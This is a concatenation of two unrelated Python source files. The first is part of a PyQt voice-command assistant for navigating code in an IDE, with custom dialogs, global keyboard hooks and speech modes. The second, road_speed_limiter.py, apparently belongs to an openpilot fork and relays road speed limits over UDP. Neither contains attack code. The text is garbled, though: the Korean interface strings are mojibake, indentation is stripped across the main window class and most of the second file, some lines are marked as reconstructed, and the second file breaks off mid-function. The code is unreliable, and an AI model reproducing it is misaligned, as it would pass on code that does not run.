            #print(USRLIB.SetForegroundWindow(int(self.winId())))
    def closeEvent(self, event):
        """Unhook the hotkey and detach from the parent before closing."""
        keyboard.unregister_hotkey(self.funct1)
        self.base.sub2=None
        event.accept()
    def paintEvent(self, event):
        self.roundener.paintEvent(event)
    def mousePressEvent(self, event):
        self.roundener.mousePressEvent(event)
        super().mousePressEvent(event)
    def mouseMoveEvent(self, event):
        self.roundener.mouseMoveEvent(event)
        super().mouseMoveEvent(event)
    def mouseReleaseEvent(self, event):
        self.roundener.mouseReleaseEvent(event)
        super().mouseReleaseEvent(event)
    def keyPressEvent(self, event):
        """Up/Down scroll one line; Escape closes the window."""
        super().keyPressEvent(event)
        if event.key()==QtCore.Qt.Key_Down:
            self.oneDown()
        elif event.key()==QtCore.Qt.Key_Up:
            self.oneUp()
        elif event.key()==QtCore.Qt.Key_Escape:
            self.close()
    def oneUp(self):
        # Scroll up one line, clamped at the top
        if self.scr > 0:
            self.scr -= 1
            self.printContent()
    def oneDown(self):
        # Scroll down one line, clamped so the last page stays full
        if self.scr < self.lim:
            self.scr += 1
            self.printContent()
    def printContent(self):
        """Render the currently visible DISP_NO-line window of the content."""
        self.label.setText(''.join(self.content[self.scr:self.scr+self.DISP_NO]))
# Delegate class that lets item views render their text as HTML
class HTMLDelegate(QtWidgets.QStyledItemDelegate):
    """Item delegate that renders an item's text as rich (HTML) text.

    A single QTextDocument is reused as a scratch buffer for both painting
    and size measurement.
    """
    def __init__(self, parent=None):
        super(HTMLDelegate, self).__init__(parent)
        # Scratch document; reloaded with the current item's HTML on each use
        self.doc = QtGui.QTextDocument(self)

    def _load_item(self, option, index):
        """Copy the style option, load the item's HTML into self.doc and
        blank the plain text so the base style doesn't draw it twice."""
        options = QtWidgets.QStyleOptionViewItem(option)
        self.initStyleOption(options, index)
        self.doc.setHtml(options.text)
        options.text = ""
        return options

    def paint(self, painter, option, index):
        painter.save()
        options = self._load_item(option, index)
        style = QtWidgets.QApplication.style() if options.widget is None \
            else options.widget.style()
        # Draw background/selection chrome without the text
        style.drawControl(QtWidgets.QStyle.CE_ItemViewItem, options, painter)
        ctx = QtGui.QAbstractTextDocumentLayout.PaintContext()
        # Use the highlighted text color when the row is selected
        if option.state & QtWidgets.QStyle.State_Selected:
            ctx.palette.setColor(QtGui.QPalette.Text, option.palette.color(
                QtGui.QPalette.Active, QtGui.QPalette.HighlightedText))
        else:
            ctx.palette.setColor(QtGui.QPalette.Text, option.palette.color(
                QtGui.QPalette.Active, QtGui.QPalette.Text))
        textRect = style.subElementRect(QtWidgets.QStyle.SE_ItemViewItemText, options, None)
        if index.column() != 0:
            textRect.adjust(5, 0, 0, 0)
        # Vertically center the text within the cell
        constant = 4
        margin = (option.rect.height() - options.fontMetrics.height()) // 2
        margin = margin - constant
        textRect.setTop(textRect.top() + margin)
        painter.translate(textRect.topLeft())
        painter.setClipRect(textRect.translated(-textRect.topLeft()))
        self.doc.documentLayout().draw(painter, ctx)
        painter.restore()

    def sizeHint(self, option, index):
        # Bug fix: previously this measured whatever HTML happened to be
        # loaded from the last paint() call.  Load the queried item's own
        # HTML so each row is sized from its actual content.
        self._load_item(option, index)
        return QtCore.QSize(self.doc.idealWidth(), self.doc.size().height())
class fn_dialog(QDialog): # search-result selection dialog (new window)
    """Table dialog listing matched functions, classes and files.

    ``content`` is a 3-element sequence: [functions, classes, files].
    The chosen row is stored in self.select_fn as [kind, index-within-kind].
    """
    def __init__(self, content):
        super().__init__()
        self.setupUI()
        # Render cell text as HTML so per-kind colours work
        delegate = HTMLDelegate(self.fn_lst)
        self.fn_lst.setItemDelegate(delegate)
        self.fn_lst.setRowCount(len(content[0]) + len(content[1]) + len(content[2]))
        # Row ranges per kind: [fn_start, class_start) = functions, etc.
        self.fn_start = 0
        self.class_start = self.fn_start + len(content[0])
        self.file_start = self.class_start + len(content[1])
        self.fn_lst.setHorizontalHeaderLabels(['์ ํ', '์ด๋ฆ', 'ํ์ผ', '์ค์ฝํ', '๋งค๊ฐ๋ณ์'])
        idx_for_listWidget = 0
        for id_type, type_line in enumerate(content):
            if(type_line):
                if(id_type == 0): # function entry: [name, file, start, end, scope, params]
                    for each_fun in type_line:
                        self.fn_lst.setItem(idx_for_listWidget, 0, QTableWidgetItem('ํจ์'))
                        # Column -> index into the function record
                        idx_for_paramer = {1:0, 2:1, 3:4, 4:5}
                        for col_ in range(1,5):
                            self.fn_lst.setItem(idx_for_listWidget, col_,QTableWidgetItem('<span style="color:red">{}</span>'.format(each_fun[idx_for_paramer[col_]])) )
                        idx_for_listWidget += 1
                elif(id_type == 1): # class entry: [name, file, start, end]
                    for each_class in type_line:
                        self.fn_lst.setItem(idx_for_listWidget, 0, QTableWidgetItem('ํด๋์ค'))
                        for col_ in range(1,3):
                            self.fn_lst.setItem(idx_for_listWidget, col_,QTableWidgetItem('<span style="color:blue">{}</span>'.format(each_class[col_-1])) )
                        idx_for_listWidget += 1
                else: # file entry: [name]
                    for each_file in type_line:
                        self.fn_lst.setItem(idx_for_listWidget, 0, QTableWidgetItem('ํ์ผ'))
                        self.fn_lst.setItem(idx_for_listWidget, 1,QTableWidgetItem('<span style="color:green">{}</span>'.format(each_file[0])) )
                        idx_for_listWidget += 1
            else:
                pass
        self.select_fn = []
        self.roundener=Roundener(self)
        self.setFocusPolicy(QtCore.Qt.StrongFocus)
        #USRLIB.SetForegroundWindow(int(self.winId()))
        self.activateWindow()
    def setupUI(self):
        """Build the centered, frameless result table with a Select button."""
        self.setGeometry(1100, 200, 300, 100)
        self.setMinimumWidth(800)
        self.setMinimumHeight(400)
        self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
        # Center the dialog on the available screen area
        qr = self.frameGeometry()
        cp = QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.move(qr.topLeft())
        label1 = QLabel("๋ค์์ ๊ฒฐ๊ณผ๋ฅผ ์ฐพ์์ต๋๋ค.")
        self.fn_lst = QTableWidget()
        self.fn_lst.setSelectionBehavior(QAbstractItemView.SelectRows)
        self.fn_lst.setSelectionMode(QAbstractItemView.SingleSelection)
        self.fn_lst.setHorizontalHeaderLabels(['์ ํ', '์ด๋ฆ', 'ํ์ผ', '์ค์ฝํ', '๋งค๊ฐ๋ณ์'])
        self.fn_lst.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
        self.fn_lst.setColumnCount(5)
        self.pushButton1 = QPushButton("Select")
        self.pushButton1.clicked.connect(self.pushButtonClicked)
        layout = QGridLayout()
        layout.addWidget(label1, 0, 0)
        layout.addWidget(self.fn_lst, 0, 1)
        layout.addWidget(self.pushButton1, 0, 2)
        self.setLayout(layout)
    def pushButtonClicked(self):
        """Translate the selected row into [kind, index-within-kind] and close."""
        row = self.fn_lst.currentRow()
        if(0<= row <self.class_start):
            self.select_fn = [0, row]
        elif(self.class_start <= row < self.file_start):
            self.select_fn = [1, row - self.class_start]
        else:
            self.select_fn = [2, row - self.file_start]
        self.close()
    def paintEvent(self, event):
        self.roundener.paintEvent(event)
    def mousePressEvent(self, event):
        self.roundener.mousePressEvent(event)
        super().mousePressEvent(event)
    def mouseMoveEvent(self, event):
        self.roundener.mouseMoveEvent(event)
        super().mouseMoveEvent(event)
    def mouseReleaseEvent(self, event):
        self.roundener.mouseReleaseEvent(event)
        super().mouseReleaseEvent(event)
class v_dialog(QDialog): # candidate-selection dialog
    """Small frameless list dialog asking the user to pick one candidate.

    The chosen QListWidgetItem (or None) ends up in self.select_fn.
    """
    def __init__(self, content):
        super().__init__()
        self.vlist=content
        self.setupUI()
        self.fn_lst.insertItems(len(content),content)
        self.select_fn = None
        self.roundener=Roundener(self)
        self.setFocusPolicy(QtCore.Qt.StrongFocus)
        # Global Up/Down hotkeys hand keyboard focus to the list (see upDown)
        self.funct1=keyboard.on_press_key(key='up', callback=self.upDown)
        self.funct2=keyboard.on_press_key(key='down', callback=self.upDown)
        #self.funct3=keyboard.on_press_key(key='Escape', callback=self.escape)
        #USRLIB.SetForegroundWindow(int(self.winId()))
        self.activateWindow()
    def setupUI(self):
        """Build the centered, frameless list with a select button."""
        self.setGeometry(1100, 200, 300, 120)
        self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
        # Center the dialog on the available screen area
        qr=self.frameGeometry()
        cp=QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.setMinimumWidth(400)
        self.move(qr.topLeft())
        label1 = QLabel("์ด๊ฑธ ์ฐพ์ผ์๋์?")
        self.fn_lst = QListWidget()
        self.pushButton1 = QPushButton("์ ํ")
        self.pushButton1.clicked.connect(self.pushButtonClicked)
        layout = QGridLayout()
        layout.addWidget(label1, 0, 0)
        layout.addWidget(self.fn_lst, 0, 1)
        layout.addWidget(self.pushButton1, 0, 2)
        self.setLayout(layout)
    def upDown(self, dummy):
        """First Up/Down press: drop the global hotkeys and click into the list
        so subsequent key presses go to the widget directly."""
        try:
            keyboard.unhook_key(self.funct1)
        except KeyError:
            pass
        try:
            keyboard.unhook_key(self.funct2)
        except KeyError:
            pass
        self.funct1=None
        self.funct2=None
        # Click inside the dialog, then restore the cursor position
        cp=self.pos()
        x, y=pyautogui.position()
        pyautogui.click(cp.x()+200, cp.y()+20)
        pyautogui.moveTo(x, y)
    def pushButtonClicked(self):
        """Store the currently highlighted item and close."""
        self.select_fn = self.fn_lst.currentItem()
        self.close()
    def paintEvent(self, event):
        self.roundener.paintEvent(event)
    def keyPressEvent(self, a0: QtGui.QKeyEvent) -> None:
        """Escape closes the dialog without a selection."""
        super().keyPressEvent(a0)
        if a0.key()==Qt.Key_Escape:
            self.close()
    def mousePressEvent(self, event):
        self.roundener.mousePressEvent(event)
        super().mousePressEvent(event)
    def mouseMoveEvent(self, event):
        self.roundener.mouseMoveEvent(event)
        super().mouseMoveEvent(event)
    def mouseReleaseEvent(self, event):
        self.roundener.mouseReleaseEvent(event)
        super().mouseReleaseEvent(event)
    def escape(self, dummy):
        self.close()
    def closeEvent(self, a0: QtGui.QCloseEvent) -> None:
        """Make sure any remaining hotkey hooks are removed on close."""
        #keyboard.unhook_key(self.funct3)
        try:
            keyboard.unhook_key(self.funct2)
        except KeyError:
            pass
        try:
            keyboard.unhook_key(self.funct1)
        except KeyError:
            pass
        return super().closeEvent(a0)
class Roundener: # rounded-window helper
    """Gives a frameless host window a rounded, painted background and makes
    it draggable with the left mouse button.

    The host window forwards its paintEvent/mouse*Event calls here.

    Args:
        window: the QWidget/QDialog being decorated.
        brush: optional custom background brush; defaults to a vertical
            yellow-to-orange gradient.
        borderRadius: corner radius in pixels for the rounded rectangle.
    """
    def __init__(self, window, brush=None, borderRadius=15):
        self.window=window
        self.window.setFont(QtGui.QFont('ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular', 10))
        self.window.setAttribute(QtCore.Qt.WA_TranslucentBackground)
        # Bug fix: these attributes were previously initialised only when no
        # custom brush was supplied, so passing a brush left paintEvent
        # (borderRadius) and every mouse handler (draggable, drag state)
        # hitting AttributeError.  Initialise them unconditionally.
        self.foregroundColor = QtGui.QColor(240,240,240)
        self.draggable = True
        self.dragging_threshould = 5  # (sic) min. manhattan distance before a drag starts
        self.__mousePressPos = None
        self.__mouseMovePos = None
        self.borderRadius=borderRadius
        if brush is None:
            # Default look: vertical yellow-to-orange gradient
            self.backBrush=QtGui.QLinearGradient(0,0,0,400)
            self.backBrush.setColorAt(0.0, QtGui.QColor(255, 255, 160))
            self.backBrush.setColorAt(1.0, QtGui.QColor(240, 200, 120))
        else:
            self.backBrush=brush
    def paintEvent(self, event):
        """Fill the whole host window with a rounded rectangle of backBrush."""
        s=self.window.size()
        qp=QtGui.QPainter()
        qp.begin(self.window)
        qp.setRenderHint(QtGui.QPainter.Antialiasing, True)
        qp.setBrush(self.backBrush)
        qp.drawRoundedRect(0, 0, s.width(), s.height(), self.borderRadius, self.borderRadius)
        qp.end()
    def mousePressEvent(self, event):
        """Remember where the drag started (global and window-local)."""
        if self.draggable and event.button() == QtCore.Qt.LeftButton:
            self.__mousePressPos = event.globalPos() # global
            self.__mouseMovePos = event.globalPos() - self.window.pos() # local
    def mouseMoveEvent(self, event):
        """Move the host window once the cursor travelled past the threshold.

        Returns the new window position when a move happened (callers may use
        it to reposition attached windows), otherwise None.
        """
        if self.__mousePressPos is None:
            return
        if self.draggable and event.buttons() & QtCore.Qt.LeftButton:
            globalPos = event.globalPos()
            moved = globalPos - self.__mousePressPos
            if moved.manhattanLength() > self.dragging_threshould:
                # move only when the user dragged further than the threshold
                diff = globalPos - self.__mouseMovePos
                self.window.move(diff)
                self.__mouseMovePos = globalPos - self.window.pos()
                return diff
    def mouseReleaseEvent(self, event):
        """End the drag; swallow the click if the window was actually dragged."""
        if self.__mousePressPos is not None:
            if event.button() == QtCore.Qt.LeftButton:
                moved = event.globalPos() - self.__mousePressPos
                if moved.manhattanLength() > self.dragging_threshould:
                    # a drag happened -- do not deliver this as a click
                    event.ignore()
                self.__mousePressPos = None
# Thin QObject carrier for a parameterless Qt signal; used to notify the GUI
# thread that a new recognition result is available (connected to
# MyApp.soundIn -- confirm against the recognition manager's usage).
class SoundSig(QObject):
    sin=QtCore.pyqtSignal()
class MyApp(QMainWindow, form_class):
def __init__(self):
super().__init__()
self.base_h = 140
self.extended_h = 300
QtGui.QFontDatabase.addApplicationFont('./resources/TmoneyRoundWindRegular.ttf')
self.sub1=None
self.sub2=None
self.blue=False
self.sin = SoundSig()
self.sin.sin.connect(self.soundIn)
self.hIdeWnd=0 # IDE Window Handle
self.pIdeWnd=0 # IDE Window Pid
self.ctx=threading.Thread(target=makeTree.scanTH, daemon=True)
# active window
threading.Thread(target=wind.currentWindow, args=[self],daemon=True).start()
self.roundener=Roundener(self)
self.setupUi(self)
self.voice.clicked.connect(self.record)
self.termButton.clicked.connect(self.close)
self.open_File.clicked.connect(self.fileopen)
self.help_button.clicked.connect(self.help)
self.macroButton.clicked.connect(self.macro)
self.help_btn.clicked.connect(self.resizeWindow)
self.help_flag = True
self.dialog = QDialog()
self.vMode=0 # 0: basic(๋ช
๋ น ๋ชจ๋, ํ๊ตญ์ด ์ธ์), 1: seek(ํ์ ๋ชจ๋, ์์ด ์ธ์), 2: peek(๋ณด๊ธฐ ๋ชจ๋, ์์ด ์ธ์)
self.voice.setText('์์') # ๊บผ์ง ์ํ
self.kCommands={
'๋ช
๋ น': lambda _: self.setVmode(0),
'ํ์': lambda _: self.setVmode(1),
'๋ณด๊ธฐ': lambda _: self.setVmode(2),
}
# window shape/titlebar/stayontop flag
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
self.open_File.setStyleSheet('''
background-image: url(./resources/folder.png); background-position: center;
background-repeat: no-repeat;
background-position: center;
''')
# button qss
self.textButtons=(
self.termButton,
self.help_button,
self.macroButton,
self.help_btn
)
for bu in self.textButtons:
bu.setStyleSheet('QPushButton:hover{ color: Red; } QPushButton{background-color: rgba(0,0,0,0); border-radius: 5px;}')
self.recording=False
self.voice.setStyleSheet('''
background-image: url(./resources/recoff.png);
background-position: center;
background-repeat: no-repeat;
color: White;
border:0px;
''')
self.funct1=keyboard.on_press_key(key='shift', callback=self.korOn)
self.funct2=keyboard.on_release_key(key='shift', callback=self.korOff)
self.language_change = False #shift ๋๋ ค ์์ผ๋ฉด ON
# stt recognition manager
self.q=queue.Queue()
self.rec_manager = RecognitionManager(self.q, self.sin)
kComm.loadSet()
def setVmode(self, m):
self.vMode=m
if self.blue:
return
self.voice.setText(MODES[m])
if m==0:
if not self.language_change:
#self.rec_manager.change_to('kor')
self.language_change=True
elif self.language_change:
self.language_change=False
#self.rec_manager.change_to('eng')
def korOn(self, dummy):
if self.blue:
return
self.blue=True
if not self.recording:
return
if not self.language_change:
self.language_change=True
#self.rec_manager.change_to('kor')
self.voice.setText('๋ช
๋ น')
self.voice.setStyleSheet(
'''
background-image: url(./resources/recon_kor.png);
background-repeat: no-repeat;
background-position: center;
font-family: ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular;
color: White;
border:0px;
'''
)
def korOff(self, dummy):
if not self.recording:
return
if self.vMode != 0:
self.language_change=False
self.voice.setText(MODES[self.vMode])
#self.rec_manager.change_to('eng')
self.voice.setStyleSheet(
'''
background-image: url(./resources/recon.png);
background-repeat: no-repeat;
background-position: center;
font-family: ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular;
color: White;
border:0px;
'''
)
self.blue=False
def record(self): # ์์ฑ์ธ์ ํจ์
self.recording = not(self.recording)
if self.recording:
self.voice.setStyleSheet('''
background-image: url(./resources/recon.png);
background-repeat: no-repeat;
background-position: center;
font-family: ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular;
color: White;
border:0px;
''')
self.voice.setText(MODES[self.vMode])
self.rec_manager.start()
if self.vMode==0:
self.language_change=True
#self.rec_manager.change_to('kor')
else:
self.voice.setStyleSheet('''
background-image: url(./resources/recoff.png);
background-position: center;
background-repeat: no-repeat;
font-family: ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular;
color: White;
border:0px;
''')
self.language_change=False
self.blue=False
self.voice.setText('์์')
self.rec_manager.stop()
def paintEvent(self, event):
self.roundener.paintEvent(event)
def mousePressEvent(self, event):
self.roundener.mousePressEvent(event)
super().mousePressEvent(event)
def mouseMoveEvent(self, event):
diff=self.roundener.mouseMoveEvent(event)
if diff and not self.help_flag:
monitor_y = QDesktopWidget().availableGeometry().height()
if (self.y() + 225 + 350) > monitor_y:
self.help_dialog.move(self.x(), self.y() - 400)
else:
self.help_dialog.move(self.x(), self.y() + 160)
super().mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
self.roundener.mouseReleaseEvent(event)
super().mouseReleaseEvent(event)
def closeEvent(self, event):
# close all children
# ์ฌ๊ธฐ์์ ํด๊ฒฐ์ด ํ์ํจ
if self.sub1 is not None:
self.sub1.close()
if self.sub2 is not None:
self.sub2.close()
if not self.help_flag:
self.help_dialog.close()
keyboard.unhook_all()
super().close()
def soundIn(self):
    """
    Handle one recognized word pulled from the speech queue.

    In Korean command mode the matched word is dispatched to the mode table
    (self.kCommands), then the built-in and custom command tables; otherwise
    the word is looked up in the scanned code tree and the chosen result is
    opened (seek, vMode 1) or previewed (peek, vMode 2).

    NOTE(review): this copy of the file had its indentation stripped and three
    lines split mid-token; both were reconstructed from context — diff this
    method against the original repository before trusting it.
    """
    word = self.q.get()
    self.vLabel.setText(word)
    # ignore commands while a child selection window is open
    if self.sub1 != None:
        return
    if self.activeWindow.text() == 'others':
        if USRLIB.SetForegroundWindow(self.hIdeWnd) == 0:
            QMessageBox.about(self, "์ค๋ฅ", "IDE๊ฐ ๊ฐ์ง๋์ง ์์์ต๋๋ค.")
            return
        else:
            time.sleep(0.1)
            kComm.ideUP(self.activeWindow.text())
    else:
        kComm.ideUP(self.activeWindow.text())
    if self.language_change:  # Korean command mode
        word2 = kComm.matchK(word)
        self.vLabel.setText(word + '->' + word2)
        if word2 in self.kCommands:  # mode-switch command
            self.kCommands[word2](0)
            return
        elif word2 in kComm.builtInCommands:  # built-in command
            guide = kComm.execute(word2)
            self.vLabel.setText(word2 + guide)
        elif word2 in kComm.customCommands:
            kComm.execute(word2)
        else:  # no matching command
            QMessageBox.about(self, "์ค๋ฅ", "ํด๋น ๋ช๋ น์ด๊ฐ ์์ต๋๋ค.")
            return
    else:  # peek or seek mode
        makeTree.scanNgc()
        sel1 = makeTree.POOL.soundIn(word)
        # let the user pick one of the matches; the choice lands in sel2
        if len(sel1) == 0:
            QMessageBox.about(self, "์ค๋ฅ", "๊ฒฐ๊ณผ๋ฅผ ์ฐพ์ ์ ์์ต๋๋ค.\n์ ํํ ๋ฐ์์ผ๋ก ๋ค์ ์๋ํด ์ฃผ์ธ์.")
            return
        if len(sel1) == 1:
            sel2 = sel1[0]
        else:
            self.sub1 = v_dialog(sel1)
            self.sub1.exec_()
            try:
                sel2 = self.sub1.select_fn.text()
            except AttributeError:  # dialog closed without a selection
                self.sub1 = None
                return
            finally:
                self.sub1 = None
        sel3 = makeTree.POOL[sel2]
        # single result: per original note, len 6 = function, 4 = class, 1 = file
        if type(sel3[0]) is not list:
            sel4 = sel3
        else:
            # several candidates (file/class/function) — show a chooser.
            # (original note: occasionally fails here when only one choice)
            self.sub1 = fn_dialog(sel3)
            self.sub1.exec_()
            try:
                sel4 = self.sub1.select_fn
                sel4 = sel3[sel4[0]][sel4[1]]
            except IndexError:
                self.sub1 = None
                return
            finally:
                self.sub1 = None
        if self.vMode == 1:  # seek: open the target in the IDE
            kComm.opn(sel4)
        elif self.vMode == 2:  # peek: preview in a child window
            if self.sub2 != None:
                self.sub2.close()
            self.sub2 = PeekerWindow(sel4, self)
            self.sub2.show()
def fileopen(self):
    """
    Prompt for a new project root directory and (re)build the code tree.

    Starts the background scan thread the first time a directory is chosen.
    """
    # BUG FIX: was `QFileDialog.Option()` (a single enum value, not a flags
    # container) and the resulting value was never passed to the dialog.
    option = QFileDialog.Options()
    option |= QFileDialog.ShowDirsOnly
    filename = QFileDialog.getExistingDirectory(self, "select Directory", options=option)
    if len(filename) > 0:
        # normalize to Windows-style backslash paths
        filename = '\\'.join(filename.split('/'))
        self.topDirectory.setText(filename)
        makeTree.setTop(filename)
        if not self.ctx.is_alive():
            self.ctx.start()
# Open the help window (instance not kept; HelpWindow presumably manages its
# own lifetime — confirm).
def help(self):
HelpWindow(self)
# Open the macro editor window (instance not kept, as with help()).
def macro(self):
MacroWindow(self)
# Frameless, always-on-top popup listing the built-in voice commands in two
# columns, positioned above or below the given (cx, cy) anchor point.
class ComList(QDialog):
def __init__(self, cx, cy):
super().__init__()
self.setMinimumWidth(250)
self.setMaximumSize(250,350)
monitor_y=QDesktopWidget().availableGeometry().height()
# place the dialog above the anchor when there is no room below it
if (cy + 225 + 350) > monitor_y:
self.move(cx, cy - 400)
else:
self.move(cx, cy + 160)
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
self.roundener=Roundener(self)
# split the command names into two roughly equal columns
bic=list(kComm.builtInCommands)
half=len(bic)//2
col1='\n'.join(bic[:half])
col2='\n'.join(bic[half:])
layout = QtWidgets.QHBoxLayout(self)
layout.addWidget(QtWidgets.QLabel(col1, self))
layout.addWidget(QtWidgets.QLabel(col2, self))
# Delegate painting to the Roundener helper, as the main window does.
def paintEvent(self, a0):
self.roundener.paintEvent(a0)
# Toggle the command-list help popup. The single-character button labels below
# are arrow glyphs that were mangled by this copy's encoding (mojibake).
def resizeWindow(self):
if self.help_flag:
self.help_btn.setText('โ')
self.help_flag = False
self.help_dialog = self.ComList(self.x(), self.y())
self.help_dialog.setWindowTitle('Help word')
self.help_dialog.setMaximumSize(250, 350)
self.help_dialog.show()
else:
self.help_btn.setText('โ')
self.help_flag = True
self.help_dialog.close()
# Script entry point: create the Qt application, show the main window and
# run the event loop until it exits.
if __name__ == '__main__':
app = QApplication(sys.argv)
myWindow = MyApp()
myWindow.show()
app.exec_()
|
road_speed_limiter.py | import json
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import interp
from common.realtime import sec_since_boot
# Recommended speed is the camera limit scaled by this fudge factor.
CAMERA_SPEED_FACTOR = 1.05


class Port:
    """Well-known UDP ports of the road-limit companion-app protocol."""

    RECEIVE_PORT = 843       # inbound JSON road-limit datagrams (bound in main())
    BROADCAST_PORT = 2899    # "EON:ROAD_LIMIT_SERVICE:v1" discovery broadcasts
    LOCATION_PORT = 2911     # outbound GPS fixes to the remote client
# Background service that receives road-limit JSON from a companion app over
# UDP, advertises itself by broadcast, and can stream GPS fixes back.
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
# the discovery broadcaster runs as a daemon for the process lifetime
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
#gps = Thread(target=self.gps_thread, args=[])
#gps.setDaemon(True)
#gps.start()
# Push GPS fixes to the last client that contacted us (thread currently
# disabled — see the commented-out start in __init__).
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
# Return wlan0's IPv4 broadcast address via ioctl 0x8919 (SIOCGIFBRDADDR),
# or None when the interface is unavailable.
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
# Announce the service every 5 s; re-resolve the address every 10th frame.
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
# Poll `sock` with a 1 s timeout; on a datagram, update `active` and
# `json_road_limit` under the lock. Returns True when data arrived.
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
# malformed packet or socket failure: drop the stale limit data
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
# Expire stale data: road-limit payload after 20 s, active flag after 10 s.
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
# Read one key from the last road_limit payload, or `default` when absent.
def get_limit_val(self, key, default=None):
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
return default
# Receive road-limit datagrams on RECEIVE_PORT and republish each one on the
# 'roadLimitSpeed' messaging socket; expire stale data via server.check().
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
roadLimitSpeed.send(dat.to_bytes())
server.check()
except Exception as e:
# remember the last error for debugging; the loop exits on fatal errors
server.last_exception = e
# Client side: subscribes to 'roadLimitSpeed' and converts camera / speed-
# section data into a recommended maximum speed for cruise control.
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.start_dist = 0
self.longcontrol = Params().get_bool('LongControlEnabled')
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
# Non-blocking poll of the subscription; keeps the last message on error.
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
# Return the companion app's "active" flag (0 when nothing received yet).
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
# Returns (max_speed, limit, left_dist, first_started, log). max_speed of 0
# means "no restriction". Speeds appear to be km/h — TODO confirm units.
def get_max_speed(self, CS, v_cruise_speed):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
# plausibility window for limits depends on the road class
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
